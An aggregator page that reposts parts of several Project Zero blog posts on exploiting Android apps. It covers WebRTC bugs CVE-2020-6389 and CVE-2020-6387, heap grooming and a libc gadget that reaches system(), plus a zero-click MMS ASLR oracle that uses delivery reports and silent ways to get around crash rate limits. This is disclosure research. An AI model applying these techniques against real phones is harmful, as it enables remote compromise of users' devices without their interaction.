I started to wonder how clearing works, considering the data is still needed by the queued thread that might not be finished yet. It turns out that the  CopyOnWriteBuffer class retains references to the data, and only deletes it if there are zero references left. Otherwise, it decrements the reference count and allocated new data of the current size for the buffer. This means it is possible to read the location of the _incoming_message_ buffer before data is written to it, because it is actually allocated during the clear. So long as the data written by AppendData is shorter or the same size as the largest size ever cleared, this memory will not be reallocated.
This allowed me to create a heap buffer at a known location and populate it. The last step was to figure out what to populate it with. I started out by filling it up with sequential numbers, and then using the address it crashed on to figure out what memory to change. After using the crash locations to create the fake vtable, I ended up with a crash on a branch to X8, and the only other controllable register was X21. X0 was of course set to the location of the fake vtable, as this crash was due to a virtual call, as were X1 and X23.
Astoundingly, libc had the perfect gadget for this situation.
do_nftw(char const*,int (*) …) + 0x138
LDR             X0, [X23,#0x30]LDR             X1, [X23,#0x70]BLR             X21
Setting the value loaded in X23 to system, and copying a string parameter at an offset of 0x30 past the fake vtable caused system to be called with the parameter!
To give a quick overview, here are the steps required for the exploit, in order:
  1. The PID is determined based on the key in the INIT chunk, and then the secret key is determined
  2. The vtable is read from the SctpTransport object
  3. The location of malloc is read from the global offset table
  4. The partial_incoming_message_ buffer is populated with data of the needed size
  5. The partial_incoming_message_ buffer is cleared, so a new buffer is allocated
  6. The address of the partial_incoming_message_ buffer is read from the SctpTransport object
  7. The address of the partial_incoming_message_ backing buffer is read from the buffer structure
  8. The partial_incoming_message_ buffer is populated with exploit data, based on the location of of malloc
  9. The bug is triggered, making a virtual call to a gadget and then system

Now I had an exploit that worked in … the WebRTC sample Android application. Stay tuned for Part 3, where I explore what real Android applications the exploit works on.
Kategorie: Hacking & Security

MMS Exploit Part 4: MMS Primer, Completing the ASLR Oracle

4 Srpen, 2020 - 18:21
Posted by Mateusz Jurczyk, Project Zero
This post is the fourth of a multi-part series capturing my journey from discovering a vulnerable little-known Samsung image codec, to completing a remote zero-click MMS attack that worked on the latest Samsung flagship devices. New posts will be published as they are completed and will be linked here when complete.
IntroductionIn Part 3 of the series, I chose one of the 174 obvious Qmage memory corruption crashes reported in Issue #2002 for exploitation. It was a linear heap buffer overflow in RLE decompression with an arbitrary allocation size, overflow size, and overflow data. By carefully adjusting the bitmap dimensions (which control the heap region size), we managed to place the pixel storage buffer directly before the associated android::Bitmap object in memory, allowing us to reliably corrupt it. From there, we constructed some potential RCE primitives, as well as a memory oracle that triggers a control flow-neutral read from a chosen memory area, triggering a crash or not depending on whether the address range is mapped and readable. In terms of low-level capabilities, this is a satisfying set of options to continue working with.
To make further progress in the exploit development, we finally have to get familiar with the MMS protocol that we'll be using as the medium of our attack. Specifically, we need to find a way to remotely leak information about the crash of the target Messages app, or lack thereof, to complete the ASLR oracle and build a more complex ASLR bypass logic on top of it. This is not completely trivial considering the unidirectional nature of MMS, but ultimately possible thanks to the little used feature of delivery reports. However, first things first – let's start with learning more about the protocol itself, and how we can move from sending test messages from a smartphone, to programmatically running experiments from a more comfortable environment of one's workstation.Setting up a test environmentIn order to be able to test MMS effectively, we need an easy way to deliver them to the target device from our PC. There are various methods to achieve this, for example Joshua Drake suggested two ways to send MMS without carriers in his Stagefright Black Hat presentation in 2015 (slides 84-85). However, I decided to take a more practical approach and send all messages through carriers, to be able to observe fully accurate results and spot any real-life issues related to conducting such an attack in practice.
To that end, I purchased two SIM cards for sending and receiving messages, and enabled an "unlimited MMS" package on the sender one to avoid excessive costs. Then, I found and licensed the NowSMS Windows software, which is a powerful solution for sending, receiving, and processing SMS/MMS. It may serve as an SMS server, MMS server, WAP Push Proxy Gateway and Multimedia Messaging Center (MMSC), and has a number of advanced features that are beyond the scope of our use case. Most importantly, it can be used to send messages through a locally connected GSM modem, or an Android phone acting as one. This is precisely the functionality we need, and it's available even in the most basic Now SMS & MMS Lite package. Notably, the service can be used in a number of ways: via a local web interface, through an HTTP API, and through developer API made available for technologies such as PHP, Java and .NET (C#, Visual Basic). The vendor also maintains an extensive documentation regarding both the product and relevant mobile protocols, and hosts an active user forum. All in all, NowSMS proved extremely helpful in my research by making interactions with SMS/MMS easily accessible on a PC, both manually and programmatically.
The screenshot below shows how the MMS sending page looks like in the Web UI (in Developer Mode). We can immediately spot a number of new and unfamiliar settings which are not available to the user when sending a message on a typical mobile phone. It looks like we have gained a much more fine grained control over what is transmitted over the cellular network:

The Android phone acting as a modem may operate in three modes: "Local WiFi", "Remote Direct" and "Remote via Cloud". In my case, I used the Remote Direct mode, and connected the sender phone to the local network via an ethernet cable, to prevent any disruptions related to wireless connectivity. At the same time, I connected the victim phone to my workstation via a USB cable for command line access and screen capturing. The structure of my setup is illustrated below:

I used a Samsung Galaxy A50 as the modem, and Samsung Galaxy Note 10+ as the receiver. In addition to having them connected to the PC for data transfer, it was obviously necessary to keep them charged throughout the testing, and to ensure that they were placed in a spot with strong cellular signal.Crafting a raw MMS PDUNow that we have a solid testing environment setup on a PC, we can dig deeper into MMS itself to better understand how it works. MMS is a relatively old technology dating back to circa 2001-2002, and since its inner workings are relevant mostly to mobile network operators, it is not documented as well as many other technologies and protocols seen in widespread use today. However, throughout this project, I have dug up a number of comprehensive books, articles, presentation slides and other educational materials on the subject. They are listed below for your convenience:

The volume of these resources may seem overwhelming, but in fact, we are only interested in a small subset of the MMS architecture, namely the MM1 protocol used between mobile devices and the MMSC (Multimedia Messaging Service Centre). The Phone to MMSC Protocol (MM1) slides from NowSMS are a highly recommended read to get a good overview of its design. In essence, we can view an MMS message as a self-contained binary file of MIME type application/vnd.wap.mms-message. It contains a number of headers (some of them required, some optional), followed by optional Multipart objects – the actual multimedia content of the message (images, audio, video, etc.). The details of the MMS binary encoding are defined by the MMS Encapsulation Protocol, and the list of headers compatible with the M-Send.req request can be found in that document in section "6.1.1 Send Request" on page 17.
An example source file of an MMS message is shown below:
 1:   X-Mms-Message-Type: m-send-req 2:   X-Mms-Version: 1.3 3:   To: 0123456789 4:   Subject: MMS subject 5:   X-Mms-Message-Class: Personal 6:   X-Mms-Priority: Normal 7:   X-NowMMS-Content-Location: message.txt;text/plain 8:   X-NowMMS-Content-Location: image.jpg;image/jpeg
Lines 1-3 specify mandatory headers, lines 4-6 specify optional headers, and lines 7-8 contain NowSMS-specific headers that point to the multimedia files to include in the message, and indicate their respective MIME types. Such MMS source can be converted to its binary form with NowSMS mmscomp command line utility:

The first 128 bytes of the message.MMS file are shown below; the rest are just the remainder of the JPEG image contents:
00000000: 8c 80 8d 90 97 30 31 32 33 34 35 36 37 38 39 00  .....0123456789.00000010: 96 4d 4d 53 20 73 75 62 6a 65 63 74 00 8a 80 8f  .MMS subject....00000020: 81 84 a3 02 1e 0d 83 c0 22 3c 6d 65 73 73 61 67  ........"<messag00000030: 65 2e 74 78 74 3e 00 8e 6d 65 73 73 61 67 65 2e  e.txt>..message.00000040: 74 78 74 00 48 65 6c 6c 6f 2c 20 77 6f 72 6c 64  txt.Hello, world00000050: 21 1a 84 df 48 9e c0 22 3c 69 6d 61 67 65 2e 6a  !...H.."<image.j00000060: 70 67 3e 00 8e 69 6d 61 67 65 2e 6a 70 67 00 ff  pg>..image.jpg..00000070: d8 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00  .....Adobe.d....
In this blob, we can see the binary-encoded headers (for example the two initial 0x8c 0x80 bytes encode "X-Mms-Message-Type: m-send-req"), as well as a number of plaintext strings corresponding to the header values, attachment file names, and data of the embedded files themselves. Such a raw MMS file can be sent via NowSMS, and will be delivered in a very similar form to the recipient device.
As a side note, correctly formatted MMS messages are also expected to contain SMIL (Synchronized Multimedia Integration Language) resources, which define how the multimedia and text should be presented to the user. If you are interested in more details on how they're used in MMS, there is a good tutorial by NowSMS on the subject. However, the SMIL markup seems to be optional in practice, and client apps such as Samsung Messages will correctly display MMS without it. When it comes to file attachments in general, what matters the most for us is that their MIME types are specified explicitly and separately in the encoded message, which enables us to freely send Qmage files marked as image/jpeg (or some other image type) and have them automatically loaded as bitmaps.MMS delivery reportsDelivery reports have been part of the MMS specification since version 1.0. They enable the sender of a message to request a confirmation of its successful delivery to the recipient. It's one of the very few ways for the sender to receive any kind of (indirect) feedback from the target phone, and it is what we intend to use to complete our ASLR oracle mechanism.
When composing the MMS PDU, a delivery report can be requested by setting the X-Mms-Delivery-Report header to "yes", which is expressed as 0x86 0x81 in binary. Here's how the header is described in Gwenaël Le Bodic's book:
Request for a delivery report. This parameter indicates whether or not delivery report(s) are to be generated for the submitted message. Two values can be assigned to this parameter: 'yes' (delivery report is to be generated) or 'no' (no delivery report requested). If the message class is 'auto', then this parameter is present in the submission PDU and is set to 'no'.
Quite frankly, I have never legitimately used this feature of MMS before. Even though it's part of the protocol, the option to request delivery reports is missing in some common apps such as Google Messages (it only supports SMS delivery reports). However, Samsung Messages does support it, so we can enable the reports under Settings > More settings > Multimedia messages > Show when delivered, and test it out:

The option does indeed work as advertised. Let's take a deeper look at how it is implemented in the protocol and in the client app, and how we can make use of it in our exploit.A closer look at MM1Once again, let me start by emphasizing that Gwenaël's slides 24-41 and the entire NowSMS MM1 slide deck explain the MM1 protocol and data flows in great detail. In our case, let's analyze the transactions involved in sending and receiving an MMS in an environment with a few assumptions:
  • The originator and recipient are both in the same network, so there is no inter-operator communication taking place. Whether this is true or not shouldn't make any practical difference for us, as the data exchange between them happens seamlessly over the MM4 protocol and doesn't have any observable side effects (that I know of).
  • The recipient has the auto-retrieval of MMS enabled, which I understand to be the default on a majority or all of Samsung devices.
  • The recipient has good enough connectivity to be able to download the message.
  • The delivery report is requested by the originator.

Under these conditions, the message exchange between two mobile phones and the MMSC is illustrated in the following diagram:

In a typical scenario, the sender initiates an M-send.req HTTP POST transaction to the carrier. Once the MMS is transmitted in full, the MMSC sends a WAP PUSH notification to the recipient to announce that a message is awaiting. In the case of auto-retrieve, the client app immediately sends an HTTP GET request, and receives the serialized MMS data in response. Finally, it acknowledges the receipt of the message with a M-notifyresp.ind POST request, and that information is forwarded back to the sender in the form of an M-delivery.ind transaction. This concludes the communication between the participating parties.
The biggest problem shown in the diagram is the fact that the Samsung Messages app parses the incoming MMS before finalizing communication with the MMSC through the M-notifyresp.ind PDU. Ideally, any processing of external data should only take place once the connection with MMSC is closed. Otherwise, if the app crashes during the processing of a corrupted media file, the final M-notifyresp.ind message is never transmitted, which causes the MMSC to classify the MMS delivery as unsuccessful and prevents it from sending the delivery receipt to the originator. This creates a very easily observable side channel, revealing whether Samsung Messages crashed on the victim phone or not.

Coupled with the powerful memory-probing primitive constructed in Part 3, the side channel enables an attacker to remotely query the readability of arbitrary address ranges, with no user interaction required. Such a capability is enormously useful on Android due to the Zygote design, and the fact that the location of code and data in the address space is persistent across program crashes. Consequently, even though the ASLR oracle output only carries 1 bit of information at a time, the overall attack can be broken down into multiple steps, and their results combined to determine complete 64-bit addresses of the necessary gadgets.
We can confirm the behavior by checking the logcat logs on the target device. When we send a regular MMS message, we can see both the WSP/HTTP GET.req and M-notifyresp.ind (POST) requests being made:
d2s:/ $ logcat -v time | grep "HTTP: "07-23 11:25:25.494 D/CS/MmsHttpClient(30665): [a@c18ed46] HTTP: GET http://<redacted>, proxy=<redacted>, PDU size=007-23 11:25:25.548 I/CS/MmsHttpClient(30665): [a@c18ed46] HTTP: User-Agent=SAMSUNG-ANDROID-MMS/SM-N975F07-23 11:25:25.548 I/CS/MmsHttpClient(30665): [a@c18ed46] HTTP: UaProfUrl= 11:25:26.449 D/CS/MmsHttpClient(30665): [a@c18ed46] HTTP: 200 OK07-23 11:25:27.388 D/CS/MmsHttpClient(30665): [a@c18ed46] HTTP: response size=6662607-23 11:25:28.825 D/CS/MmsHttpClient(30665): [a@c18ed46] HTTP: POST http://<redacted>, proxy=<redacted>, PDU size=1607-23 11:25:28.831 I/CS/MmsHttpClient(30665): [a@c18ed46] HTTP: User-Agent=SAMSUNG-ANDROID-MMS/SM-N975F07-23 11:25:28.831 I/CS/MmsHttpClient(30665): [a@c18ed46] HTTP: UaProfUrl= 11:25:29.155 D/CS/MmsHttpClient(30665): [a@c18ed46] HTTP: 200 OK07-23 11:25:29.155 D/CS/MmsHttpClient(30665): [a@c18ed46] HTTP: response size=0
The time span between receiving the full message from the MMSC and sending the acknowledgement is around 1.5 seconds. On the other hand, when we send a malformed Qmage file, only the WSP/HTTP GET.req request is visible in the logs:
d2s:/ $ logcat -v time | grep "HTTP: "07-23 11:32:10.890 D/CS/MmsHttpClient(30665): [a@1c69780] HTTP: GET http://<redacted>, proxy=<redacted>, PDU size=007-23 11:32:10.899 I/CS/MmsHttpClient(30665): [a@1c69780] HTTP: User-Agent=SAMSUNG-ANDROID-MMS/SM-N975F07-23 11:32:10.899 I/CS/MmsHttpClient(30665): [a@1c69780] HTTP: UaProfUrl= 11:32:11.272 D/CS/MmsHttpClient(30665): [a@1c69780] HTTP: 200 OK07-23 11:32:11.273 D/CS/MmsHttpClient(30665): [a@1c69780] HTTP: response size=935
Before M-notifyresp.ind can be sent, the process crashes after ~1.3 seconds of reading the HTTP response:
130|d2s:/ $ logcat -b crash -v time07-23 11:32:12.585 F/libc    (30665): Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x41414141414189 in tid 31866 (pool-8-thread-1), pid 30665 (droid.messaging)
This confirms the insecure behavior on the client app side. How does it look from the perspective of an attacker? When the M-delivery.ind PDU is received by NowSMS, it is decoded and saved in a text file with a .HDR extension in the "C:\Program Files (x86)\NowSMS\MMS-IN" directory, for example C0B04508.HDR:
X-NowMMS-RCPT-TO: <redacted>/TYPE=PLMNX-NowMMS-Modem-Name: NowSMSModem - a50Message-type: m-delivery-indMMS-version: 1.2Message-id: 20200723-11-E46838C6@nowsmsTo: <redacted>/TYPE=PLMNDate: Thu, 23 Jul 2020 09:55:00 GMTStatus: Retrieved
The status is indicated as "retrieved", and the report can be associated with the original message through the value of the Message-id header. Otherwise, if the original MMS crashes the target phone, we don't see any immediate return messages in the MMS-IN directory. Depending on the MMS expiry period (specified in the headers or defined by the operator's default setting), the carrier may retry to deliver the message, and if that fails, it eventually expires and the sender is notified about it too:
X-NowMMS-RCPT-TO: <redacted>/TYPE=PLMNX-NowMMS-Modem-Name: NowSMSModem - a50Message-type: m-delivery-indMMS-version: 1.2Message-id: 20200723-11-D44AF894@nowsmsTo: <redacted>/TYPE=PLMNDate: Thu, 23 Jul 2020 11:03:39 GMTStatus: Expired
The carriers I have experimented with have a default expiration period of 48 hours, and it can be manually adjusted with the X-Mms-Expiry header to values between 1 minute and 48 hours. In my exploit, I didn't use the expiration aspect at all, and simply assumed that Samsung Messages crashed if the delivery report was not received within 30 seconds of sending the message. This completes the construction of a functional MMS-based ASLR oracle, which is an essential building block of a generic ASLR bypass logic discussed in the next blog post in the series.Further thoughts on oracle reliabilityThe reliability of the presented ASLR oracle scheme is generally high, provided that both the sender and recipient devices maintain good connectivity with the MMSC. The weakest link is by far the android::Bitmap memory corruption primitive, which relies on two subsequent 160-byte jemalloc allocations being adjacent in memory. This generally holds true, but we have no guarantee that the condition will be always met, especially since the relevant jemalloc bin (chunks between 129-160 bytes in size) is not particularly quiet and is also utilized for other unrelated objects by the Samsung Messages app. Needless to say, any ASLR bypass logic we devise will most likely assume 100% accuracy of the oracle output, so we have to put some extra effort to make sure that the oracle can be indeed relied upon.
One simple technique we can use to improve the reliability of the attack is to have each oracle MMS processed with a relatively clean state of the heap. This can be accomplished by unconditionally crashing the client app with a malformed Qmage file, causing the process to be killed and restarted from scratch when the next message arrives on the phone. Of course the ASLR oracle output false already implies a crash taking place, so extra artificial crashes are only needed at the very beginning of the attack (before the first oracle query), and after each query returning true. The type of the artificial crash doesn't matter as long as it always reproduces; it can be a huge out-of-bounds read/write, a NULL pointer dereference, assertion failure, or any condition that doesn't depend on the existing state of the process to trigger a crash. In my exploit, I used the signal_sigsegv_400357fc6c_7014_c1d4fedf1cbcdd583e0f331f32df1f72.qmg sample from crash 39b052a01c99f60982ec92f8d01a5401, which accesses a NULL pointer returned by a malloc call with a negative integer passed as the size.
This one trick allowed me to achieve an oracle accuracy rate of more than 99% (loose estimate) on my Galaxy Note 10+ test device. In my case, it was sufficient to completely rely on each single measurement to successfully defeat ASLR without making any mistakes during the process, but your mileage may vary depending on the device model, Android version, existing history of messages in the SMS app, or even specific options enabled on the phone (such as WiFi) during the attack. If the oracle accuracy drops below a certain threshold, it may be necessary to introduce redundant memory probes sent to the target for each tested address range, and only return the output value to the higher levels of the exploit code once there is enough confidence about its validity.ActivityManager and crash rate limiting on AndroidBased on what we know so far, we can assume that any potential attack will involve a number of crashes of Samsung Messages on the victim phone, some of them carrying address space information and some triggered simply to reset the heap. The ability to continuously crash and have an app restarted on a remote device is a crucial requirement, so we should verify that this is actually possible on Android. If we send corrupted Qmages via MMS twice in a short span of time, we will observe two crashes, as expected:
d2s:/data/local/tmp $ logcat -b crash -v time07-23 15:52:45.549 F/libc    ( 8930): Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0 in tid 10606 (pool-5-thread-1), pid 8930 (droid.messaging)[...]07-23 15:52:55.517 F/libc    (10727): Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0 in tid 10776 (pool-5-thread-1), pid 10727 (droid.messaging)[...]
If we then send a third message, Samsung Messages won't be spawned to handle it. Instead, we'll see the following message:
07-23 15:54:28.639 23268 23317 W BroadcastQueue: Unable to launch app for broadcast Intent { act=android.provider.Telephony.WAP_PUSH_DELIVER typ=application/vnd.wap.mms-message flg=0x18000010 (has extras) }: process is bad
At this point, we (as the attacker) are cut off from the device and cannot reach or interact with the remote Qmage attack surface anymore. In fact, the victim won't be able to receive SMS/MMS from anyone until they manually start the Messages app again. So what happened here, and does it mean that all our efforts up to this point were in vain?
When I first saw the warning, I immediately went looking for clues at It was easy to locate the culprit based on the "process is bad" string: it is printed out when a call to mService.startProcessLocked fails in This may generally only happen when mService.mAppErrors.isBadProcessLocked returns true for the app in question:
boolean isBadProcessLocked(ApplicationInfo info) {      return mBadProcesses.get(info.processName, info.uid) != null;}
There is a list of bad processes in the system, but how does an app end up on that list? The answer can be found in the handleAppCrashLocked method in, and specifically in the following lines (slightly reformatted for readability):
if (crashTime != null && now < crashTime + ProcessList.MIN_CRASH_INTERVAL) {    // The process crashed again very quickly.    // If it was a bound foreground service, let's try to restart again in a    // while, otherwise the process loses!    Slog.w(TAG, "Process " +            + " has crashed too many times: killing!");[...]           mBadProcesses.put(, app.uid,                    new BadProcessInfo(now, shortMsg, longMsg, stackTrace));
In the above snippet, now is the current timestamp and crashTime is the time of the last crash of the app. Accordingly, the logic checks if two crashes in a single app have occurred in a short period of time, and if so, it bans the process indefinitely from future restarts. How short is short? Let's look up the MIN_CRASH_INTERVAL constant in
// The minimum time we allow between crashes, for us to consider this// application to be bad and stop and its services and reject broadcasts.static final int MIN_CRASH_INTERVAL = 60 * 1000;
It's 60 seconds. From the attacker's point of view, this is certainly not perfect, but also not terribly bad. This logic of the ActivityManager service means that at no point in time, should we trigger two crashes of the Messages app within one minute, or the attack will be halted. In the context of our ASLR oracle, it limits the probing rate to one query a minute, which may be acceptable or not depending on how many queries are required to break the ASLR. For example, if we consider a realistic attack to be carried out during the night, that leaves us with a maximum of 8 hours × 60 minutes ~= 480 queries. The good news (for exploitation) is, that there is no absolute limit of crashes for one app, and we can interact with the MMS client indefinitely as long as we slow down the communication to meet the crash interval condition.
The diagram below illustrates the high-level process of safely sending two ASLR oracle queries to a target phone, taking the mandatory cooldown period into account. The first query returns true and takes two MMS to complete (one probe and one unconditional crash), and the second one returns false. Note how there is always a guaranteed 60 second gap between two subsequent crashes on the recipient device:

On a closing note, there is one more important detail to consider in the crash handling logic. If we look closely at the source code of the handleAppCrashLocked method, we can notice that the timestamp is obtained through the SystemClock.uptimeMillis() API:
       final long now = SystemClock.uptimeMillis();
As the documentation states, this is not exactly the wall clock time we have assumed it to be:
uptimeMillis() is counted in milliseconds since the system was booted. This clock stops when the system enters deep sleep (CPU off, display dark, device waiting for external input), but is not affected by clock scaling, idle, or other power saving mechanisms. This is the basis for most interval timing such as Thread#sleep(long), Object#wait(long), and System#nanoTime. This clock is guaranteed to be monotonic, and is suitable for interval timing when the interval does not span device sleep. Most methods that accept a timestamp value currently expect the uptimeMillis() clock.
According to my experimentation on the Galaxy Note 10+ device, when the phone is in an inactive state (e.g. set aside on a bedside table with the display off), the clock indeed doesn't progress. This makes practical zero-click exploitation even more challenging, as it is not enough to just wait for 60 seconds before sending the next MMS. Instead, the attacker has to keep the target phone somehow occupied for those 60 seconds, while not triggering any vibration/notification sounds at the same time. The most obvious way to achieve this is through the cellular network, and I have identified at least three techniques that could be used to silently and remotely keep a phone busy:
  • By sending an MMS with empty text (i.e. an empty text/plain MIME file), a few seconds can be wasted while the phone receives and processes the message. In the end, the empty text leads to an unhandled Java exception being thrown in the Messages app, preventing it from showing any notification to the user. I abused this behavior in my exploit to send an initial "ping" to quietly verify that the recipient phone is responsive (see 0:43-0:56 in the exploit demo). It has been fixed in Samsung Messages since version
  • By sending an MMS with very long text (at least around 140 kB in my testing), a few seconds can be similarly wasted by the victim phone. In this corner case, the misbehavior is slightly different and varies between devices, as the unhandled Java exception is thrown in the midst of generating a user notification, when it is already displayed on the screen, but before the notification sound rings. As such, it also qualifies as a (literally) silent CPU cycle burning trick.
  • By sending a very long SMS of 5180+ characters, which is divided into 34 segments of 140 characters each. The target phone starts receiving the SMS segments, roughly one per second, but for some reason (I didn't investigate this deeply) it stops reassembling the message after the 33rd part, and abandons it completely without generating any notifications. During the process of receiving and saving the initial portions of the SMS in the internal database, the uptimeMillis clock progresses by around 35 seconds in my test setup.

These are some basic ideas for ways to transmit data to the phone such that it has to spend cycles processing it, but fails at some point before notifying the owner. I am sure many more similar techniques exist, and specialized software such as NowSMS certainly helps put the relevant mobile apps to the test against very unusual conditions. All in all, the nature of the uptimeMillis clock is not a fundamental barrier in remote Android exploitation, but it is an annoying aspect that needs to be addressed with the use of additional techniques, and it may extend the overall attack time and impair its reliability. With 60 seconds of active CPU time required between each ASLR oracle query, we might also start being concerned about the extent of power consumption induced by the exploit on target phones with low battery levels… :)SummaryIn this episode, we set up an environment to programmatically send MMS messages from a Windows PC, and learned the basics of the client ⟷ MMSC MM1 protocol and its encapsulation encoding. This enabled us to specify the X-Mms-Delivery-Report header in outgoing messages, and abuse the delivery report feature to establish a 1-bit side channel indicating if the recipient's Messages app crashed while processing our malformed Qmage image or not. Based on this capability and the address-probing primitive built in Part 3, we now have a fully functional (albeit somewhat slow) ASLR oracle at our disposal. We are getting close to defeating ASLR and finally executing arbitrary code.
To make further progress in the research, we have to face a few remaining questions:
  • What types of addresses are we interested in leaking? Which libraries will be needed to achieve RCE, and do we also need to disclose any data locations?
  • How do we find any regions in memory at all, starting with absolutely no initial insight as to where they might be located?
  • Finally, how do we achieve this in a relatively small number of steps (preferably low hundreds), such that the attack has a realistic execution time?

All of these matters will be discussed in detail in the upcoming Part 5. Stay tuned!
Kategorie: Hacking & Security

Exploiting Android Messengers with WebRTC: Part 1

3 Srpen, 2020 - 19:40
Posted by Natalie Silvanovich, Project Zero

This is a three-part series on exploiting messenger applications using vulnerabilities in WebRTC. This series highlights what can go wrong when applications don't apply WebRTC patches and when the communication and notification of security issues breaks down. Part 2 is scheduled for August 5 and Part 3 is scheduled for August 6.
Part 1: First Attempts
WebRTC is an open source video conferencing solution used by a variety of software including browsers, messaging clients and streaming services. While Project Zero has reported several vulnerabilities in WebRTC in the past, it was not clear whether these bugs were exploitable, especially outside of browsers. I investigated whether two recent bugs are exploitable in popular Android messaging applications.The Bugs
I started off by trying to exploit two bugs, CVE-2020-6389 and CVE-2020-6387.
Both of these vulnerabilities are in WebRTC’s Remote Transport Protocol (RTP) processing. RTP is the protocol WebRTC uses to transport audio and video content from peer to peer. RTP supports extensions, which are extra pieces of data that can be included in each packet to tell the destination peer how to display or process the data. For example, there is an extension that contains information about the screen orientation of the sending device, and one that contains the volume level. Both of these vulnerabilities occurred in extensions that had been implemented in WebRTC in 2019.
CVE-2020-6389 occurred in the frame marking extension, which contains information on how video content is split into frames. The bug is in how it processes layer information: WebRTC only supports five layers, but the layer number is a three-bit field in the extension, which means it can go as high as seven. This leads to an out-of-bounds write in the following code. temporal_idx is set from the layer number in the extension. 
if (layer_info_it->second[temporal_idx] != -1 &&AheadOf<uint16_t>(layer_info_it->second[temporal_idx], frame->id.picture_id)) {      // Not a newer frame. No subsequent layer info needs update.     break;   }  ...   layer_info_it->second[temporal_idx] = frame->id.picture_id;
The final line of code is where the out-of-bounds write occurs, as the array only contains five elements. This bug also has some limitations not obvious from the above code. To start, there is a check before the write, that checks whether the current value of the memory, casted to a 16-bit unsigned integer is more than the current sequence number. The write only occurs if this is true. Practically, this wasn’t much of a limitation, a crash usually occurred after two or three times when I tested it. A more serious limitation is that the layer_info_it->second field has a 64-bit integer type, but  frame->id.picture_id is a 16-bit integer. This means that while this bug allows an attacker to write up to three 64-bit integers outside of a fixed size heap buffer, the values that can be written are very limited, and are too small to represent pointers.
CVE-2020-6387 is a bug in how the video timing extension is processed by Forward Error Correction (FEC). FEC copies incoming RTP packets, and then clears certain extensions when attempting to correct errors. This vulnerability occurs because extensions of the video timing type are not verified to be of the expected length before they are cleared. The code causing this bug is as follows:
case RTPExtensionType::kRtpExtensionVideoTiming: {       // Nullify 3 last entries: packetization delay and 2 network timestamps.       // Each of them is 2 bytes.       uint8_t* p = WriteAt(extension.offset) + VideoSendTiming::kPacerExitDeltaOffset;       memset(           p,           0, 6);       break;     }
The value of VideoSendTiming::kPacerExitDeltaOffset is 7, so this code writes six zeros from offset 7 to offset 13 from the start of the extension in the packet. However, there is no check that the extension data is more than 13 bytes long, or even that the packet has this number of bytes left. The result of this bug is that an attacker can write up to six zeros to the heap at an offset of up to seven bytes from a variable sized heap buffer. This bug is better than CVE-2020-6389 in some ways and worse in others. It is better in that the heap buffer that can be overflowed is variable size, which gives a lot more options of what can be overwritten by this bug on the heap. The offset also offers some flexibility on where the zeros are written, and the write does not have to be aligned, whereas CVE-2020-6389 requires 64-bit alignment. This bug is worse in that the value written has to be zero, and the size of the area that can be written is smaller (six bytes versus 24).Moving the Instruction Pointer
I started off by seeing if it was possible to use either of these bugs to move the instruction pointer. Modern Android uses jemalloc, a slab allocator which doesn’t use inline heap headers, so corrupting heap metadata was not an option. Instead, I compiled WebRTC for Android with symbols, and loaded it in IDA. I then went through the available object types to see if there was anything that could obviously be used to move the instruction pointer or improve the capabilities of the bug. I didn’t find anything.
I thought maybe I could use CVE-2020-6389 to overwrite a length and cause a larger overflow, but this had some problems. To start, the bug writes a 64-bit integer, meanwhile a lot of length fields are 32-bit integers, which means the write also overwrites something else, and can only write a non-zero value if the length is 64-bit aligned. The location of the bug in processing is also problematic, as it does the overwrite near the end of the incoming packet being processed, meaning that many objects are not accessed again after this point, so any overwritten memory would never be used again. CVE-2020-6389 also overwrites a heap buffer of fixed size 80, which limits the object types that can be affected by this bug. I didn’t think CVE-2020-6387 would be viable for this purpose either, as it can only write zeros, which can only make a length smaller.
I wasn’t sure where to go at this point, so I triggered CVE-2020-6389 a few dozen times on Android to see if there were any crashes at an address wider than 16-bits, hoping they might give me ideas of ways that this bug could influence the behavior of the code other than overwriting a pointer with an invalid 16-bit value. To my surprise, it crashed with the instruction pointer set to a value that had clearly been read off the heap about one in 20 times. 
Analyzing the crash, it turned out that a StunMessage object was being allocated after the overflowed region. The members of the StunMessage class are as follows.
protected:  std::vector<std::unique_ptr<StunAttribute>> attrs_; ... private:  ...  uint16_t type_;  uint16_t length_;  std::string transaction_id_;  uint32_t reduced_transaction_id_;  uint32_t stun_magic_cookie_;
So after the vtable, the first member is a vector. How are vectors laid out in memory? It turns out its first two members are as follows.
  pointer __begin_;  pointer __end_;
These pointers point to the beginning and the end of the vector’s contents in memory. During the crash, the __end_ member was overwritten with a small 16-bit integer. Vector iteration works by starting at the __begin_ pointer and incrementing until the  __end_ pointer is reached, so this change means that the next time the vector is iterated over, usually in the destructor, it will go out of bounds. Since this vector contains virtual objects of type StunAttribute, it will perform a virtual call to each element, to call its destructor. This virtual call on out-of-bounds memory was what was moving the instruction pointer.
This seemed like a reasonable way to control the instruction pointer, except for one problem: in a typical configuration, it is not possible for an attacker at one end of a WebRTC connection to send STUN to the user at the other, instead they each communicate with their own STUN server. I asked Philipp Hancke of webrtchacks if he knew of a way. He suggested this method, which involves specifying a TCP server controlled by the attacker as a potential routable path between two peers, called an ICE candidate. Both the attacker and target device will then communicate through this server, including STUN messages.
This allowed me to send STUN messages with an unusually large number of attributes. This was necessary because in order to control the instruction pointer, I would need to be able to control what showed up in memory after the STUN attribute vector. jemalloc allocates similar sized allocations, determined by predefined size classes in contiguous memory runs. The less used a size class is, the more likely it is that two objects of the same size class will be allocated one after the other. 
Typically, STUN messages have a small number of attributes, which translates to a vector buffer size of 32 or 64 bytes, which are both very frequently used size classes. Instead, I sent STUN messages with 128 attributes, which translated to a vector buffer size of 1024 bytes, which happens to be an infrequently used size class in WebRTC. By sending many STUN messages with this number of attributes, while at the same time sending RTP packets of size 1024 containing the desired pointer value, interspersed with packets containing the bug, I was able to get a virtual call on that pointer value about one in five times. This was good enough for use in an exploit, and I decided to move on to breaking ASLR.Breaking ASLR
There were two possible approaches for breaking ASLR in this exploit. One was to use one of the above bugs to read memory and send it back to the attacker device or TCP server somehow, the other was to use some sort of crash oracle to determine the memory layout.
I started off by seeing whether it was possible to use one of the bugs to read memory remotely from the target device. Mark Brand suggested that it might be possible to use CVE-2020-6387 to accomplish this by setting the low bytes of a pointer to outgoing data to zero, causing out-of-bounds data to be sent instead of the actual data. This seemed like a promising approach, so I used IDA to look for potential objects.
